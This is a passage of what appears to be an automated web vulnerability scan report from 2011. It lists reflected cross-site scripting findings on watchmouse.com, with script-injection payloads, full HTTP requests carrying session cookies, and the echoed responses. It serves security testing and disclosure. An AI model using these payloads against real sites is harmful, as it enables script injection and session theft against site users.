Pragma: no-cache
Last-Modified:
ETag: "0-en-1098e9db0fe9c510b88e7e17fa9c3595"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets645c0"><script>alert(1)</script>40b63ed072a/img/favicon.ico" method="post">
...[SNIP]...

1.24. http://www.watchmouse.com/assets/img/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/img/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c01ba"><script>alert(1)</script>918860c39ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/imgc01ba"><script>alert(1)</script>918860c39ed/favicon.ico HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-3dadb7e6f1301f5005a30ed580c52755"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/imgc01ba"><script>alert(1)</script>918860c39ed/favicon.ico" method="post">
...[SNIP]...

1.25. http://www.watchmouse.com/assets/img/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/img/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9735e"><script>alert(1)</script>00477431364 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/img/favicon.ico9735e"><script>alert(1)</script>00477431364 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-29244c4d7a932ed992f4b452587731c6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/img/favicon.ico9735e"><script>alert(1)</script>00477431364" method="post">
...[SNIP]...

1.26. http://www.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/easySlider1.7.packed.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5992"><script>alert(1)</script>79192fdc272 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetsc5992"><script>alert(1)</script>79192fdc272/js/easySlider1.7.packed.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.4.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-6183b6e18c71236ef619923b826b92d1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetsc5992"><script>alert(1)</script>79192fdc272/js/easySlider1.7.packed.js" method="post">
...[SNIP]...

1.27. http://www.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/easySlider1.7.packed.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aa16"><script>alert(1)</script>d47c58a6ac3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js2aa16"><script>alert(1)</script>d47c58a6ac3/easySlider1.7.packed.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.4.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-771b83200fa6d1c2a1c8ef05ed9c5749"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js2aa16"><script>alert(1)</script>d47c58a6ac3/easySlider1.7.packed.js" method="post">
...[SNIP]...

1.28. http://www.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/easySlider1.7.packed.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b695d"><script>alert(1)</script>98bb2971b97 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/easySlider1.7.packed.jsb695d"><script>alert(1)</script>98bb2971b97 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.4.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-09f7c8db94b1cc48804bacc6e57df92f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/easySlider1.7.packed.jsb695d"><script>alert(1)</script>98bb2971b97" method="post">
...[SNIP]...

1.29. http://www.watchmouse.com/assets/js/fancybox.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/fancybox.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63d29"><script>alert(1)</script>f8f5c150ce6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets63d29"><script>alert(1)</script>f8f5c150ce6/js/fancybox.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f1d57486057c75ddd83b66302305cb75"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets63d29"><script>alert(1)</script>f8f5c150ce6/js/fancybox.js" method="post">
...[SNIP]...

1.30. http://www.watchmouse.com/assets/js/fancybox.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/fancybox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbbca"><script>alert(1)</script>025207eb5df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsbbbca"><script>alert(1)</script>025207eb5df/fancybox.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-763008a2a55f2157565075c0f128c3fa"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsbbbca"><script>alert(1)</script>025207eb5df/fancybox.js" method="post">
...[SNIP]...

1.31. http://www.watchmouse.com/assets/js/fancybox.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/fancybox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e613"><script>alert(1)</script>3882974db40 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/fancybox.js7e613"><script>alert(1)</script>3882974db40 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-d3f2f510681c4b32ef1509f391ddc085"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/fancybox.js7e613"><script>alert(1)</script>3882974db40" method="post">
...[SNIP]...

1.32. http://www.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18fa0"><script>alert(1)</script>9887127cfc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets18fa0"><script>alert(1)</script>9887127cfc0/js/jquery-1.3.2.min.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-1e1476c6b78dfdf97e9299633ad5949a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets18fa0"><script>alert(1)</script>9887127cfc0/js/jquery-1.3.2.min.js" method="post">
...[SNIP]...

1.33. http://www.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b881b"><script>alert(1)</script>93267d4eec5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsb881b"><script>alert(1)</script>93267d4eec5/jquery-1.3.2.min.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-67cf0316f2e36f0cdc359c9a88c63725"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsb881b"><script>alert(1)</script>93267d4eec5/jquery-1.3.2.min.js" method="post">
...[SNIP]...

1.34. http://www.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12eb8"><script>alert(1)</script>e6898e9e942 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/jquery-1.3.2.min.js12eb8"><script>alert(1)</script>e6898e9e942 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-2aa4647a7396d08e8f4e072a969b484d"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/jquery-1.3.2.min.js12eb8"><script>alert(1)</script>e6898e9e942" method="post">
...[SNIP]...

1.35. http://www.watchmouse.com/assets/js/learn_more.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/learn_more.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 546d8"><script>alert(1)</script>1957a09d746 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets546d8"><script>alert(1)</script>1957a09d746/js/learn_more.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/learn_more.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
